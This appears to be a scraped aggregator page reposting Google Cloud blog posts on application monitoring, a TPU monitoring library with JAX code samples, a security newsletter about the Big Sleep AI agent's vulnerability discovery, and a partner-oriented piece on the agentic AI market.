Figure 3 – Metrics Explorer showing application labels automatically associated with metrics

Figure 4 – Trace Explorer showing AppHub label Integration

3. Gemini Cloud Assist Investigations

Troubleshoot issues faster with AI powered Investigations.

Gemini Cloud Assist’s investigation feature makes it easier to troubleshoot issues because application boundaries and relationships have been propagated into the AI model, grounding it in context about your environment.

Figure 5 – Seamless entry point into Gemini Cloud Assist powered Investigations from application logs

Note – Gemini Cloud Assist Investigations is currently in private preview

Try Application Monitoring today

The new Application Monitoring experience provides a low-effort unified view of application and infrastructure performance for your troubleshooting needs.

Take advantage of the new Google Cloud Application Monitoring experience by:

Visiting your Cloud console
Setting up Applications in AppHub

Adding Services and Workloads to your Application

Navigating to Application Monitoring in Cloud Observability to see your automatically built experience

Enable your Gemini Cloud Assist SKU and sign up for the trusted tester program to get access to the Investigations experience

Related docs

Application Monitoring docs
AppHub docs
1. Apphub coverage docs

Read More for the details.

2025 07 18

GCP – Announcing a new monitoring library to optimize TPU performance

Tibor Kiss Cloud, Google Cloud gcp

For more than a decade, TPUs have powered Google’s most demanding AI training and serving workloads. And there is strong demand from customers for Cloud TPUs as well. When running advanced AI workloads, you need to be able to monitor and optimize the efficiency of your training and inference jobs, and swiftly diagnose performance bottlenecks, node degradation, and host interruptions. Ultimately, you need real-time optimization logic built into your training and inference pipelines so you can maximize the efficiency of your applications — whether you’re optimizing for ML Goodput, operational cost, or time-to-market.

Today, we’re thrilled to introduce a new monitoring library for Google Cloud TPUs, a new set of observability and diagnostic tools that provide granular, integrated performance and accelerator utilization insights so you can continuously assess and improve the efficiency of your Cloud TPU workloads.

Note: If you have shell access to the TPU VM and just need some diagnostic information (e.g., to observe memory usage for a running process), you can use tpu-info, a command-line tool for viewing TPU metrics.

Unlocking dynamic optimization: Key metrics in action

The monitoring library provides snapshot-mode access to a rich set of metrics, such as Tensor core utilization, high-bandwidth memory (HBM) usage, and buffer transfer latency. Metrics are sampled every second (1 Hz) for consistency. See the documentation for a full list of metrics and how you can use them.

You can use these metrics in your code directly to dynamically optimize for greater efficiency. For instance, if your duty_cycle_pct (a measure of utilization) is consistently low, you can programmatically adjust your data pipeline or increase batch size to better saturate the Tensor core. If hbm_capacity_usage approaches limits, your code could trigger a dynamic reduction in model size or activate memory-saving strategies to avoid out-of-memory errors. Similarly, hlo_exec_timing (how long operations are taking to execute on the accelerator) and hlo_queue_size (how many operations are waiting to be executed) can inform runtime adjustments to communication patterns or workload distribution based on observed bottlenecks.

Let’s see how to set up the library with a couple of realistic examples.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3e33286cea30>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/compute’), (‘image’, None)])]>

Getting started with the library

The TPU monitoring library is integrated within the LibTPU library. Here’s how to install it:

code_block: <ListValue: [StructValue([(‘code’, ‘pip install libtpu’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e33286ce760>)])]>

For JAX or PyTorch users, libTPU is included in your installation when you install jax[tpu] or torch_xla[tpu] (read more about PyTorch/XLA and JAX installation).

You can refer to the library in your Python code: from libtpu.sdk import tpumonitoring. You can then discover supported functionality with sdk.monitoring.help() and list available metric names using tpumonitoring.list_supported_metrics().

Example 1. Monitoring TPU duty cycle during training for dynamic adjustment

Integrate duty_cycle_pct logging into your JAX training loop to track how busy the TPUs are.

code_block: <ListValue: [StructValue([(‘code’, ‘import jaxrnfrom libtpu.sdk import tpumonitoringrnimport timernrn# — Your JAX model and training setup would go here —rn# — Example placeholder model and data (replace with your actual setup)—rndef simple_model(x):rn return jnp.sum(x)rnrndef loss_fn(params, x, y):rn preds = simple_model(x)rn return jnp.mean((preds – y)**2)rnrndef train_step(params, x, y, optimizer):rn grads = jax.grad(loss_fn)(params, x, y)rn return optimizer.update(grads, params)rnrnkey = jax.random.PRNGKey(0)rnparams = jnp.array([1.0, 2.0]) # Example paramsrnoptimizer = None # Your optimizer (for example, optax.adam)rndata_x = jnp.ones((10, 10))rndata_y = jnp.zeros((10,))rnrnnum_epochs = 10rnlog_interval_steps = 2 # Log duty cycle every 2 stepsrnrnfor epoch in range(num_epochs):rn for step in range(5): # Example steps per epochrnrn params = train_step(params, data_x, data_y, optimizer)rnrn if (step + 1) % log_interval_steps == 0:rn # — Integrate TPU Monitoring Library here to get duty_cycle —rn rn rn duty_cycle_metric = tpumonitoring.get_metric(metric_name=”duty_cycle_pct”) duty_cycle_data = duty_cycle_metric.data() rn print(f”Epoch {epoch+1}, Step {step+1}: TPU Duty Cycle Data:”) print(f” Description: {duty_cycle_metric.description()}”)rn print(f” Data: {duty_cycle_data}”) # — End TPU Monitoring Library Integration —rnrn # — Rest of your training loop logic —rn time.sleep(0.1) # Simulate some computation rnrnprint(“Training complete.”)’), (‘language’, ‘lang-py’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e33286ce220>)])]>

A consistently low duty cycle suggests potential CPU bottlenecks or inefficient data loading. This example simply prints out the value, but in the real world you can trigger a re-sharding or other actions.

Example 2. Checking HBM utilization before JAX inference for resource management

While running JAX programs on Cloud TPUs, optimizing HBM usage during compilation presents a significant opportunity. By proactively getting insights on potential TPU memory reservations during compilation, you can unlock greater efficiency and prevent out-of-Memory (OOM) errors, which is especially crucial for scaling large models. By checking the hbm_capacity_usage metric from the monitoring library you can see the available HBM, allowing for dynamic adjustments to your inference strategy and mitigating memory errors.

code_block: <ListValue: [StructValue([(‘code’, ‘import jaxrnimport jax.numpy as jnprnfrom libtpu.sdk import tpumonitoringrnrn# — Your JAX model and inference setup would go here —rn# — Example placeholder model (replace with your actual model loading/setup)—rndef simple_model(x):rn return jnp.sum(x)rnrnkey = jax.random.PRNGKey(0)rnparams = None # Load your trained parametersrnrn# Integrate TPU Monitoring Library to get HBM utilization before inferencernrnhbm_util_metric = tpumonitoring.get_metric(metric_name=”hbm_capacity_usage”)rnhbm_util_data = hbm_util_metric.data()rnprint(“HBM Utilization Before Inference:”)rnprint(f” Description: {hbm_util_metric.description()}”)rnprint(f” Data: {hbm_util_data}”)rn# End TPU Monitoring Library Integrationrnrn# Your Inference Logicrninput_data = jnp.ones((1, 10)) # Example inputrnpredictions = simple_model(input_data)rnprint(“Inference Predictions:”, predictions)rnrnprint(“Inference complete.”)’), (‘language’, ‘lang-py’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e33286ced00>)])]>

If HBM usage is unexpectedly high, you might consider optimizing your model size, batching strategy, or input data pipelines.

Maximize your TPU utilization

In this post, we showed you two simple examples of how you can improve the efficiency of your TPU workloads with some proactive monitoring. The TPU monitoring library can help you improve the utilization of your accelerator, dynamically tune them to your use cases, and ensure you have the best cost efficiencies.

To learn more about the TPU monitoring library, please visit the documentation. To get started with Cloud TPUs, please visit our Intro to TPU documentation.

Read More for the details.

2025 07 17

GCP – Cloud CISO Perspectives: Our Big Sleep agent makes a big leap, and other AI news

Tibor Kiss Cloud, Google Cloud gcp

Welcome to the first Cloud CISO Perspectives for July 2025. Today, Sandra Joyce, vice president, Google Threat Intelligence, talks about an incredible milestone with our Big Sleep AI agent, as well as other news from the intersection of security and AI.

As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.

aside_block: <ListValue: [StructValue([(‘title’, ‘Get vital board insights with Google Cloud’), (‘body’, <wagtail.rich_text.RichText object at 0x3e3deeb08100>), (‘btn_text’, ‘Visit the hub’), (‘href’, ‘https://cloud.google.com/solutions/security/board-of-directors?utm_source=cloud_sfdc&utm_medium=email&utm_campaign=FY24-Q2-global-PROD941-physicalevent-er-CEG_Boardroom_Summit&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>

Our Big Sleep agent makes a big leap, and other AI news

By Sandra Joyce, vice president, Google Threat Intelligence

Business leaders everywhere are scrambling to implement AI in a way that creates value while trying to define what that value means — at the same time. As we build on our efforts to shape AI and define AI workflows in cybersecurity, we are already really excited about using AI in the work that we do.

I spoke about some of that work at the RSA Conference in April, including how AI is reshaping cybersecurity and how Google uses data to drive our practical applications of AI in both attack and defense. We revealed Tuesday that our Big Sleep AI agent, first introduced in November 2024 by Google DeepMind and Project Zero, has taken a very significant step for defenders: We believe this is the first time an AI agent has been used to directly foil efforts to exploit a vulnerability in the wild.

Through the combination of threat intelligence from the Google Threat Intelligence Group (GTIG) and the Big Sleep AI agent, we were recently able to identify a critical SQLite vulnerability known only to threat actors that was imminently going to be used — and actually cut it off beforehand.

With Big Sleep, we’ve demonstrated how we can find vulnerabilities that defenders don’t yet know about. In this case, we found a vulnerability that the attackers knew about and had every intention of using, and we were able to detect and report it for patching before they could exploit it.

Developed by Google DeepMind and Google Project Zero, Big Sleep can help security researchers find zero-day (previously-unknown) software security vulnerabilities. Since it was introduced last year, it has continued to discover multiple flaws in widely-used software, exceeding our expectations and accelerating AI-powered vulnerability research.

Attackers have long had an advantage because they were taking shots at a massive goal with a lot of ground to defend, but the productivity gains from a defender’s point of view are astounding to us. If you had a human in place of Big Sleep, they would’ve had to pour over two different versions of open-source source code and manually see where the vulnerability was, all while knowing that attackers were planning on using this vulnerability soon.

Speed and accuracy made all the difference in this case, which gave us an edge over threat actors. Since defenders own and control these systems, AI has given us a very powerful development (and vulnerability remediation) advantage.

Big Sleep is also being deployed to help improve the security of other widely-used open-source projects, too — a major win for ensuring faster, more effective security across the internet more broadly.

Empowering defensive AI agents

While AI agents represent a sea change for cybersecurity, the work they do needs to be done safely and responsibly. We outlined our approach to building AI agents in June in ways that safeguard privacy, mitigate the risks of rogue actions, and ensure the agents operate with the benefit of human oversight and transparency. When deployed according to secure by design principles, agents can give defenders an edge like no other tool that came before them.

We will continue to share our agentic AI insights and report findings through our industry-standard disclosure process. You can keep tabs on all publicly-disclosed vulnerabilities from Big Sleep on our issue tracker page.

We’re seeing the impact of AI across security, from boosting threat hunting to stronger security validations to smarter red team analyses. Similarly, the speed and accuracy of AI comes to aid defenders when dealing with the ever-growing onslaught of email phishing attacks. Attackers have been using AI to improve a lot of the previous hints that a legit-looking email was actually a phishing attack, such as using colloquial language, proper slang, and tailoring the email to the recipient.

Yet if you train the AI model to look at what spearphishing emails look like, it can get better at detection, triage, and identifying phishing threats faster and at a scale that if a human has to jump in to review something, they have to review less now. Our AI-powered defenses help Gmail block all sorts of phishing, spam, and malware.

Gmail automatically blocks more than 99.9% of spam, phishing and malware, and protects over 1.5 billion inboxes.
We developed several ground-breaking AI models last year that significantly strengthened Gmail cyber defenses, including a new large language model (LLM) that we trained on phishing, malware and spam that blocks 20% more spam than before and reviews 1,000 times more user-reported spam daily.

When it comes to attackers and their use of AI, we’re still in the “before times.” As I noted at RSAC, Google Threat Intelligence Group has seen AI used to flesh out code, we’ve seen AI used for deepfakes, and to craft better spearphishing emails, but we’ve yet to see a big, game-changing incident where AI did something that humans simply couldn’t have done. We haven’t seen anything like an agentic attacker or an agentic attack, or a self-perpetuated campaign.

I fully anticipate that these types of attacks are coming, so it’s crucial that AI developers collaborate across industry and with public sector partners to prepare defenders and ensure AI’s success. As part of our efforts to build partnerships, we worked with industry partners last year to launch the Coalition for Secure AI (CoSAI), an initiative to ensure the safe implementation of AI systems.

To further this work, we announced yesterday that Google will donate data from our Secure AI Framework (SAIF) to help accelerate CoSAI’s agentic AI, cyber defense, and software supply chain security workstreams.

At Google, we’ve been investing in AI and machine learning tools for more than a decade. While we have always believed in AI’s potential to help make software more secure, over the last year we have seen real leaps in its capabilities, with AI redefining what lasting and durable cybersecurity can look like.

You can learn more about our efforts to use AI to help secure and support organizations around the world from our Office of the CISO.

aside_block: <ListValue: [StructValue([(‘title’, ‘Join the Google Cloud CISO Community’), (‘body’, <wagtail.rich_text.RichText object at 0x3e3deeb080a0>), (‘btn_text’, ‘Learn more’), (‘href’, ‘https://rsvp.withgoogle.com/events/ciso-community-interest?utm_source=cgc-blog&utm_medium=blog&utm_campaign=2024-cloud-ciso-newsletter-events-ref&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>

In case you missed it

Here are the latest updates, products, services, and resources from our security teams so far this month:

Summer of cybersecurity: Empowering defenders with AI: We’re sharing more about our latest AI innovations for security, public and private partnerships, and new initiatives to secure the digital ecosystem for everyone — including our plans for Black Hat and Def Con. Read more.
Engineering Deutsche Telekom’s sovereign data platform: Ashutosh Mishra, vice-president at Deutsche Telekom, explains how Google Cloud helped the company build its sovereign data platform. Read more.
New networking features in GDC air-gapped can power innovation: Three major advancements in Google Distributed Cloud air-gapped networking are designed to give you more control over your environment. Read more.
Unpacking security in Looker Conversational Analytics: Your data remains under your control when using Looker Conversational Analytics, letting you use Gemini to better understand your data. Read more.
Opening up Zero-Knowledge Proof technology to promote privacy in age assurance: Open sourcing these powerful cryptographic tools will make it much easier for private and public sector developers to build their own privacy-enhancing applications and digital ID solutions, meeting an urgent need. Read more.
Advancing protection in Chrome on Android: Android recently announced Advanced Protection, which extends our Advanced Protection Program to a device-level security setting for Android users that need heightened security. Here’s how it integrates with Chrome on Android. Read more.

Please visit the Google Cloud blog for more security stories published this month.

aside_block: <ListValue: [StructValue([(‘title’, ‘Fact of the month’), (‘body’, <wagtail.rich_text.RichText object at 0x3e3deeb08610>), (‘btn_text’, ‘Learn more’), (‘href’, ‘https://bughunters.google.com/blog/5753079171252224/ai-bugswat-in-tokyo-2025-hacker-roadshow’), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>

Threat Intelligence news

Why isolated recovery environments are critical in modern cyber resilience: IREs can provide a measurable, critical difference in disaster recovery strategies. Here are practical steps organizations can take to implement them effectively. Read more.
Securing protection relays in modern substations: Cyberattacks on digitized protection relays in substations pose a severe threat to power grid stability, risking widespread outages and infrastructure damage. With CISA warning of heightened risks from Iran-nexus groups targeting vital networks, here’s what critical infrastructure providers need to know about securing these relays. Read more.

Please visit the Google Cloud blog for more threat intelligence stories published this month.

Now hear this: Podcasts from Google Cloud

The SIEM Paradox: Logs, lies, and failing to detect: Svetla Yankova, founder and CEO, Citreno, joins hosts Anton Chuvakin and Tim Peacock to talk about SIEM tooling and threat detection challenges. Listen here.
Resilience and security with Google Product Security Engineering: How does Google balance high reliability and operational excellence with the needs of detection and response? Cristina Vintila, product security engineering manager, Google Cloud, talks with Anton and Tim about how PSE has evolved. Listen here.
The human element when designing privacy: From consulting with a world leader to Fuschia, Sarah Aoun, Google privacy engineer, goes deep into the nuances, challenges, and excitement of building digital privacy with Anton and Tim. Listen here.
The Defender’s Advantage: The rise of ClickFix: Dima Lenz, security engineer, Google Threat Intelligence Group, joins host Luke McNamara to discuss how threat actors have been using ClickFix to socially engineer users. Listen here.

To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.

Read More for the details.

2025 07 17

GCP – Shaping the future together with our partners: The potential of agentic AI

Tibor Kiss Cloud, Google Cloud gcp

Partners have always been central to the Google Cloud ecosystem, becoming more and more instrumental in bringing Google’s AI innovations to enterprises. I am inspired by how partners have already built more than 1,000 agentic use cases across every domain to solve deeply entrenched pain points for our shared customers.

The emergence of agentic AI marks a true paradigm shift for technology, promising to reshape industries and redefine how businesses operate and create value. For our incredible ecosystem of partners, this represents a profound opportunity to lead customers into a more intelligent and automated future.

To chart this new territory, we’re releasing a new analysis today that provides a strategic framework for the journey ahead: Shaping the Future: The Transformative Potential of Agentic AI and the Strategic Imperative for Google Cloud Partners.

An unprecedented opportunity for our partners

Our analysis¹ reveals that agentic AI is set to create a ~$1T global market for agentic AI services for partners. To put this in context, the projected $350B to $450B opportunity in the U.S. alone is larger than the entire U.S. traditional partner services market today.

Last year, our partner ecosystem influenced nearly 80% of Google Cloud’s incremental revenue growth. This year, IDC² expects our global system integrators to grow their Google Cloud AI practices as much as 100% as customers see increasing ROI. Now, with agentic AI, our partner ecosystem can build on this incredible momentum. Today, more than 90% of enterprises report interest in deploying agentic AI solutions within the next three years. Leading software players are also signaling their conviction, with agentic AI mentions in public filings 12x more today vs a year ago. The pace of adoption is electric and distinct value pools are fast emerging. Our ecosystem must act quickly to tap into the substantial, immediate opportunity already at stake.

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e3deb1f5b80>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

The strategic leap for partners: From implementer to transformer

Leading in the agentic era means moving beyond technology implementation. To drive fundamental business transformation with agentic AI, SIs need to secure “quick wins” to deliver immediate ROI while simultaneously building toward “big bets” on long-term innovation. By providing value on high-impact workflows, partners can build the credibility and reusable IP needed to tackle the bespoke, multi-agent systems that will define the future. This journey is guided by six core principles:

Identify pain points and build prototypes: Focus on solving high-value, customer-specific pain points to drive differentiation, delivering working prototypes to prove value from day one.
Reimagine core business processes: Evolve the delivery to go beyond pure technical and systems execution, with initial focus on upfront consultative AI design to help customers restructure business processes by co-designing agentic workflows.
Use new tools to solve data gaps: Create opportunities to quickly overcome clients’ perceived data readiness challenges by using generative AI tools and modern inter-agent communication protocols to activate agents with less structured datasets.
Deploy agents at scale: Manage change and embed agents into business workflow, and establish processes to track agent performance. Bring robust change management capabilities to accelerate deployment and deliver clear ROI.
Manage the full agentic lifecycle: Deliver new forms of ongoing support, such as orchestrating agentic fleets, evaluating agent performance and refreshing agent knowledge. Create long-term competitive advantage by investing in reusable IP and reference integrations.
Innovate commercially: Consider different pricing models to align with the nature of agentic AI. Explore recurring, transaction-based, or outcome-based structures that reflect the measurable impact agents deliver.

Our commitment: Building the industry’s best agentic AI ecosystem with you

We are committed to supporting our partners at every level with a partner-first approach to services and delivery. We continue to infuse partners into every layer of our agentic AI stack to enable a truly open and thriving ecosystem, including:

Open Innovation and thought leadership: We are committed to open-source contributions like the Agent Development Kit (ADK) and the Agent2Agent (A2A) protocol, fostering interoperability with support from over 100 industry leaders like ServiceNow and Workday. Our best-in-class infrastructure and pioneering AI research is powered by Google AI and DeepMind, who will continue to bring partners the leading technologies available.
A purpose-built stack for agents: We provide a comprehensive toolkit to build, deploy, scale and commercialize agentic solutions with maximum interoperability. With best in class security and governance at all layers to ensure seamless and secure rollout of many agents across an enterprise. At its foundation, partners have choice across GPUs, TPUs and 200+ AI models. Partners can solve data readiness issues using BigQuery, develop custom agents on a unified platform with Vertex AI, commercialize them through the Google Cloud Agent Marketplace and make available to users on Agentspace.
A thriving partner ecosystem: Our partner-first commitment extends beyond technology. We are increasing resources to help you address customer demand for AI agents, including a 2x increase in funding AI opportunities over the past year alone. We will continue to invest in your success with increased funding for critical partner training and enhanced co-selling programs to help you close larger deals, faster.

The future of AI will be shaped by those who lead from the front. The partners who act decisively now will not just participate in this evolution – they will define the category. I am thrilled about the journey ahead. I invite you to download the full analysis to explore these insights in greater detail and continue to share your perspectives on how best we can co-create the agentic future.

^{1. Google Cloud commissioned Boston Consulting Group to analyze agentic AI TAM for services partners.}
^{2. IDC InfoBrief, sponsored by Google Cloud, Google Cloud AI: Driving Opportunity and Growth for Global Consulting & Systems Integrator Partners, doc #US53276025, April 2025}

Read More for the details.